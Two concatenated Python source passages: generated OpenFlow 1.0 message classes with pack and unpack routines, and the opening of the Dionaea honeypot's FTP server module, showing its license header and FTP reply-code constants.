packed.append(struct.pack("!L", self.advertise))
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = port_mod()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 15)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.port_no = util.unpack_port_no(reader)
obj.hw_addr = list(reader.read('!6B'))
obj.config = reader.read("!L")[0]
obj.mask = reader.read("!L")[0]
obj.advertise = reader.read("!L")[0]
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.port_no != other.port_no: return False
if self.hw_addr != other.hw_addr: return False
if self.config != other.config: return False
if self.mask != other.mask: return False
if self.advertise != other.advertise: return False
return True
def pretty_print(self, q):
q.text("port_mod {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.text(","); q.breakable()
q.text("hw_addr = ");
q.text(util.pretty_mac(self.hw_addr))
q.text(","); q.breakable()
q.text("config = ");
q.text("%#x" % self.config)
q.text(","); q.breakable()
q.text("mask = ");
q.text("%#x" % self.mask)
q.text(","); q.breakable()
q.text("advertise = ");
q.text("%#x" % self.advertise)
q.breakable()
q.text('}')
message.subtypes[15] = port_mod
class port_mod_failed_error_msg(error_msg):
version = 1
type = 1
err_type = 4
def __init__(self, xid=None, code=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if code != None:
self.code = code
else:
self.code = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.err_type))
packed.append(struct.pack("!H", self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = port_mod_failed_error_msg()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 1)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_err_type = reader.read("!H")[0]
assert(_err_type == 4)
obj.code = reader.read("!H")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.code != other.code: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("port_mod_failed_error_msg {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("code = ");
q.text("%#x" % self.code)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
error_msg.subtypes[4] = port_mod_failed_error_msg
class port_stats_reply(stats_reply):
version = 1
type = 17
stats_type = 4
def __init__(self, xid=None, flags=None, entries=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if entries != None:
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = port_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 4)
obj.flags = reader.read("!H")[0]
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.port_stats_entry.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.entries != other.entries: return False
return True
def pretty_print(self, q):
q.text("port_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("entries = ");
q.pp(self.entries)
q.breakable()
q.text('}')
stats_reply.subtypes[4] = port_stats_reply
class port_stats_request(stats_request):
version = 1
type = 16
stats_type = 4
def __init__(self, xid=None, flags=None, port_no=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(util.pack_port_no(self.port_no))
packed.append('\x00' * 6)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = port_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 4)
obj.flags = reader.read("!H")[0]
obj.port_no = util.unpack_port_no(reader)
reader.skip(6)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.port_no != other.port_no: return False
return True
def pretty_print(self, q):
q.text("port_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.breakable()
q.text('}')
stats_request.subtypes[4] = port_stats_request
class port_status(message):
version = 1
type = 12
def __init__(self, xid=None, reason=None, desc=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if reason != None:
self.reason = reason
else:
self.reason = 0
if desc != None:
self.desc = desc
else:
self.desc = ofp.port_desc()
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!B", self.reason))
packed.append('\x00' * 7)
packed.append(self.desc.pack())
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = port_status()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 12)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.reason = reader.read("!B")[0]
reader.skip(7)
obj.desc = ofp.port_desc.unpack(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.reason != other.reason: return False
if self.desc != other.desc: return False
return True
def pretty_print(self, q):
q.text("port_status {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("reason = ");
q.text("%#x" % self.reason)
q.text(","); q.breakable()
q.text("desc = ");
q.pp(self.desc)
q.breakable()
q.text('}')
message.subtypes[12] = port_status
class queue_get_config_reply(message):
version = 1
type = 21
def __init__(self, xid=None, port=None, queues=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if port != None:
self.port = port
else:
self.port = 0
if queues != None:
self.queues = queues
else:
self.queues = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(util.pack_port_no(self.port))
packed.append('\x00' * 6)
packed.append(loxi.generic_util.pack_list(self.queues))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = queue_get_config_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 21)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.port = util.unpack_port_no(reader)
reader.skip(6)
obj.queues = loxi.generic_util.unpack_list(reader, ofp.common.packet_queue.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.port != other.port: return False
if self.queues != other.queues: return False
return True
def pretty_print(self, q):
q.text("queue_get_config_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("port = ");
q.text(util.pretty_port(self.port))
q.text(","); q.breakable()
q.text("queues = ");
q.pp(self.queues)
q.breakable()
q.text('}')
message.subtypes[21] = queue_get_config_reply
class queue_get_config_request(message):
version = 1
type = 20
def __init__(self, xid=None, port=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if port != None:
self.port = port
else:
self.port = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(util.pack_port_no(self.port))
packed.append('\x00' * 2)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = queue_get_config_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 20)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.port = util.unpack_port_no(reader)
reader.skip(2)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.port != other.port: return False
return True
def pretty_print(self, q):
q.text("queue_get_config_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("port = ");
q.text(util.pretty_port(self.port))
q.breakable()
q.text('}')
message.subtypes[20] = queue_get_config_request
class queue_op_failed_error_msg(error_msg):
version = 1
type = 1
err_type = 5
def __init__(self, xid=None, code=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if code != None:
self.code = code
else:
self.code = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.err_type))
packed.append(struct.pack("!H", self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = queue_op_failed_error_msg()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 1)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_err_type = reader.read("!H")[0]
assert(_err_type == 5)
obj.code = reader.read("!H")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.code != other.code: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("queue_op_failed_error_msg {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("code = ");
q.text("%#x" % self.code)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
error_msg.subtypes[5] = queue_op_failed_error_msg
class queue_stats_reply(stats_reply):
version = 1
type = 17
stats_type = 5
def __init__(self, xid=None, flags=None, entries=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if entries != None:
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = queue_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 5)
obj.flags = reader.read("!H")[0]
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.queue_stats_entry.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.entries != other.entries: return False
return True
def pretty_print(self, q):
q.text("queue_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("entries = ");
q.pp(self.entries)
q.breakable()
q.text('}')
stats_reply.subtypes[5] = queue_stats_reply
class queue_stats_request(stats_request):
version = 1
type = 16
stats_type = 5
def __init__(self, xid=None, flags=None, port_no=None, queue_id=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
if queue_id != None:
self.queue_id = queue_id
else:
self.queue_id = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(util.pack_port_no(self.port_no))
packed.append('\x00' * 2)
packed.append(struct.pack("!L", self.queue_id))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = queue_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 5)
obj.flags = reader.read("!H")[0]
obj.port_no = util.unpack_port_no(reader)
reader.skip(2)
obj.queue_id = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.port_no != other.port_no: return False
if self.queue_id != other.queue_id: return False
return True
def pretty_print(self, q):
q.text("queue_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.text(","); q.breakable()
q.text("queue_id = ");
q.text("%#x" % self.queue_id)
q.breakable()
q.text('}')
stats_request.subtypes[5] = queue_stats_request
class set_config(message):
version = 1
type = 9
def __init__(self, xid=None, flags=None, miss_send_len=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if miss_send_len != None:
self.miss_send_len = miss_send_len
else:
self.miss_send_len = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.flags))
packed.append(struct.pack("!H", self.miss_send_len))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_config()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 9)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.flags = reader.read("!H")[0]
obj.miss_send_len = reader.read("!H")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.miss_send_len != other.miss_send_len: return False
return True
def pretty_print(self, q):
q.text("set_config {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("miss_send_len = ");
q.text("%#x" % self.miss_send_len)
q.breakable()
q.text('}')
message.subtypes[9] = set_config
class table_mod(message):
version = 1
type = 22
def __init__(self, xid=None, table_id=None, config=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if table_id != None:
self.table_id = table_id
else:
self.table_id = 0
if config != None:
self.config = config
else:
self.config = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!B", self.table_id))
packed.append('\x00' * 3)
packed.append(struct.pack("!L", self.config))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = table_mod()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 22)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.table_id = reader.read("!B")[0]
reader.skip(3)
obj.config = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.table_id != other.table_id: return False
if self.config != other.config: return False
return True
def pretty_print(self, q):
q.text("table_mod {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("table_id = ");
q.text("%#x" % self.table_id)
q.text(","); q.breakable()
q.text("config = ");
q.text("%#x" % self.config)
q.breakable()
q.text('}')
message.subtypes[22] = table_mod
class table_stats_reply(stats_reply):
version = 1
type = 17
stats_type = 3
def __init__(self, xid=None, flags=None, entries=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if entries != None:
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = table_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 3)
obj.flags = reader.read("!H")[0]
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.table_stats_entry.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.entries != other.entries: return False
return True
def pretty_print(self, q):
q.text("table_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("entries = ");
q.pp(self.entries)
q.breakable()
q.text('}')
stats_reply.subtypes[3] = table_stats_reply
class table_stats_request(stats_request):
version = 1
type = 16
stats_type = 3
def __init__(self, xid=None, flags=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = table_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 3)
obj.flags = reader.read("!H")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
return True
def pretty_print(self, q):
q.text("table_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.breakable()
q.text('}')
stats_request.subtypes[3] = table_stats_request
def parse_header(buf):
if len(buf) < 8:
raise loxi.ProtocolError("too short to be an OpenFlow message")
return struct.unpack_from("!BBHL", buf)
def parse_message(buf):
msg_ver, msg_type, msg_len, msg_xid = parse_header(buf)
if msg_ver != ofp.OFP_VERSION and msg_type != ofp.OFPT_HELLO:
raise loxi.ProtocolError("wrong OpenFlow version (expected %d, got %d)" % (ofp.OFP_VERSION, msg_ver))
if len(buf) != msg_len:
raise loxi.ProtocolError("incorrect message size")
return message.unpack(loxi.generic_util.OFReader(buf))
| gzamboni/sdnResilience | loxi/of10/message.py | Python | gpl-2.0 | 248,179 |
#*************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
# Copyright (c) 2009 Markus Koetter
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# Copyright (c) 2001-2009
#
# Allen Short
# Andrew Bennetts
# Apple Computer, Inc.
# Benjamin Bruheim
# Bob Ippolito
# Canonical Limited
# Christopher Armstrong
# David Reid
# Donovan Preston
# Eric Mangold
# Itamar Shtull-Trauring
# James Knight
# Jason A. Mobarak
# Jean-Paul Calderone
# Jonathan Lange
# Jonathan D. Simms
# Juergen Hermann
# Kevin Turner
# Mary Gardiner
# Matthew Lefkowitz
# Massachusetts Institute of Technology
# Moshe Zadka
# Paul Swartz
# Pavel Pergamenshchik
# Ralph Meijer
# Sean Riley
# Software Freedom Conservancy
# Travis B. Hartwell
# Thomas Herve
# Eyal Lotem
# Antoine Pitrou
# Andy Gayton
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/
# ftp server
from dionaea.core import connection, ihandler, g_dionaea, incident
import logging
import os
import urllib.parse
import tempfile
logger = logging.getLogger('ftp')
logger.setLevel(logging.DEBUG)
#
# the following definitions are taken from twisted
# MIT licensed code, gpl compatible
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
DATA_CNX_ALREADY_OPEN_START_XFR = "125"
FILE_STATUS_OK_OPEN_DATA_CNX = "150"
CMD_OK = "200.1"
TYPE_SET_OK = "200.2"
ENTERING_PORT_MODE = "200.3"
CMD_NOT_IMPLMNTD_SUPERFLUOUS = "202"
SYS_STATUS_OR_HELP_REPLY = "211"
DIR_STATUS = "212"
FILE_STATUS = "213"
HELP_MSG = "214"
NAME_SYS_TYPE = "215"
SVC_READY_FOR_NEW_USER = "220.1"
WELCOME_MSG = "220.2"
SVC_CLOSING_CTRL_CNX = "221"
GOODBYE_MSG = "221"
DATA_CNX_OPEN_NO_XFR_IN_PROGRESS = "225"
CLOSING_DATA_CNX = "226"
TXFR_COMPLETE_OK = "226"
ENTERING_PASV_MODE = "227"
ENTERING_EPSV_MODE = "229"
USR_LOGGED_IN_PROCEED = "230.1" # v1 of code 230
GUEST_LOGGED_IN_PROCEED = "230.2" # v2 of code 230
REQ_FILE_ACTN_COMPLETED_OK = "250"
PWD_REPLY = "257.1"
MKD_REPLY = "257.2"
USR_NAME_OK_NEED_PASS = "331.1" # v1 of Code 331
GUEST_NAME_OK_NEED_EMAIL = "331.2" # v2 of code 331
NEED_ACCT_FOR_LOGIN = "332"
REQ_FILE_ACTN_PENDING_FURTHER_INFO = "350"
SVC_NOT_AVAIL_CLOSING_CTRL_CNX = "421.1"
TOO_MANY_CONNECTIONS = "421.2"
CANT_OPEN_DATA_CNX = "425"
CNX_CLOSED_TXFR_ABORTED = "426"
REQ_ACTN_ABRTD_FILE_UNAVAIL = "450"
REQ_ACTN_ABRTD_LOCAL_ERR = "451"
REQ_ACTN_ABRTD_INSUFF_STORAGE = "452"
SYNTAX_ERR = "500"
SYNTAX_ERR_IN_ARGS = "501"
CMD_NOT_IMPLMNTD = "502"
BAD_CMD_SEQ = "503"
CMD_NOT_IMPLMNTD_FOR_PARAM = "504"
# v1 of code 530 - please log in
NOT_LOGGED_IN = "530.1"
# v2 of code 530 - authorization failure
AUTH_FAILURE = "530.2"
NEED_ACCT_FOR_STOR = "532"
# no such file or directory
FILE_NOT_FOUND = "550.1"
PERMISSION_DENIED = "550.2" # permission denied
# anonymous users can't alter filesystem
ANON_USER_DENIED = "550.3"
# rmd called on a path that is not a directory
IS_NOT_A_DIR = "550.4"
REQ_ACTN_NOT_TAKEN = "550.5"
FILE_EXISTS = "550.6"
IS_A_DIR = "550.7"
PAGE_TYPE_UNK = "551"
EXCEEDED_STORAGE_ALLOC = "552"
FILENAME_NOT_ALLOWED = "553"
RESPONSE = {
# -- 100's --
DATA_CNX_ALREADY_OPEN_START_XFR: '125 Data connection already open, starting transfer',
FILE_STATUS_OK_OPEN_DATA_CNX: '150 File status okay; about to open data connection.',
# -- 200's --
CMD_OK: '200 Command OK',
TYPE_SET_OK: '200 Type set to %s.',
ENTERING_PORT_MODE: '200 PORT OK',
SYS_STATUS_OR_HELP_REPLY: '211 System status reply',
DIR_STATUS: '212 %s',
FILE_STATUS: '213 %s',
HELP_MSG: '214 help: %s',
NAME_SYS_TYPE: '215 UNIX Type: L8',
WELCOME_MSG: "220 %s",
SVC_READY_FOR_NEW_USER: '220 Service ready',
GOODBYE_MSG: '221 Goodbye.',
DATA_CNX_OPEN_NO_XFR_IN_PROGRESS: '225 data connection open, no transfer in progress',
CLOSING_DATA_CNX: '226 Abort successful',
TXFR_COMPLETE_OK: '226 Transfer Complete.',
ENTERING_PASV_MODE: '227 Entering Passive Mode (%s).',
# where is epsv defined in the rfc's?
ENTERING_EPSV_MODE: '229 Entering Extended Passive Mode (|||%s|).',
USR_LOGGED_IN_PROCEED: '230 User logged in, proceed',
GUEST_LOGGED_IN_PROCEED: '230 Anonymous login ok, access restrictions apply.',
#i.e. CWD completed ok
REQ_FILE_ACTN_COMPLETED_OK: '250 Requested File Action Completed OK',
PWD_REPLY: '257 "%s"',
# -- 300's --
USR_NAME_OK_NEED_PASS: '331 Password required for %s.',
GUEST_NAME_OK_NEED_EMAIL: '331 Guest login ok, type your email address as password.',
REQ_FILE_ACTN_PENDING_FURTHER_INFO: '350 Requested file action pending further information.',
# -- 400's --
CANT_OPEN_DATA_CNX: "425 Can't open data connection.",
CNX_CLOSED_TXFR_ABORTED: '426 Transfer aborted. Data connection closed.',
# -- 500's --
SYNTAX_ERR: "500 Syntax error: %s",
SYNTAX_ERR_IN_ARGS: '501 syntax error in argument(s) %s.',
CMD_NOT_IMPLMNTD: "502 Command '%s' not implemented",
BAD_CMD_SEQ: '503 Incorrect sequence of commands: %s',
